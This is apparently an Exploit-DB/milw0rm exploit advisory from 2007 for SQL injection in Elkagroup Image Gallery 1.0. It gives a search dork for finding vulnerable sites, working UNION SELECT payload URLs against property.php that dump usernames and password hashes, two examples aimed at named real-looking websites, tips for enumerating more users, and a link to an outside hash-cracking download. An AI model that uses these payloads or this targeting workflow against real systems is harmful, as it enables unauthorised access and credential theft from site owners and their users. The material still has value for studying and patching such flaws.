Elkagroup Image Gallery 1.0 - SQL Injection

EDB-ID:

4114


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-06-26


--==+================================================================================+==--
--==+            Image Gallery 1.0 SQL Injection Vulnerbilitys                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: N/A


SITE: http://www.elkagroup.com/


DORK: intext:elkagroup  Image Gallery v1.0

DESCRIPTION: With this vuln you can display every user:hash in the database

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users



EXAMPLES:

EXAMPLE 1: http://www.abfa-esfahan.com/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users

EXAMPLE 2 (getting diffrent user): http://www.qanat.info/en/gallery/property.php?cid=0&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%20not%20in%20(0x71616E6174696E)

NOTE/TIP: hex the first username you get with EXAMPLE 1 then use EXAMPLE 2 and replace the hex with your new hex, To get diffrent users.
Also sometimes te columns may vary so if its not working correct, add a few columns and remove a few, Enjoy.

NOTE/TIP: The md5 has 13 characters removed from the end.

Cracking Hashes: the hash this script uses is a modifed MD5 i have coded a tool for any type of md5 hash it works very well and is extremely fast while
leaveing your cpu untouched, download it here: http://www.h4cky0u-filez.org/5819352

GREETZ: str0ke, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+            Image Gallery 1.0 SQL Injection Vulnerbilitys                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-26]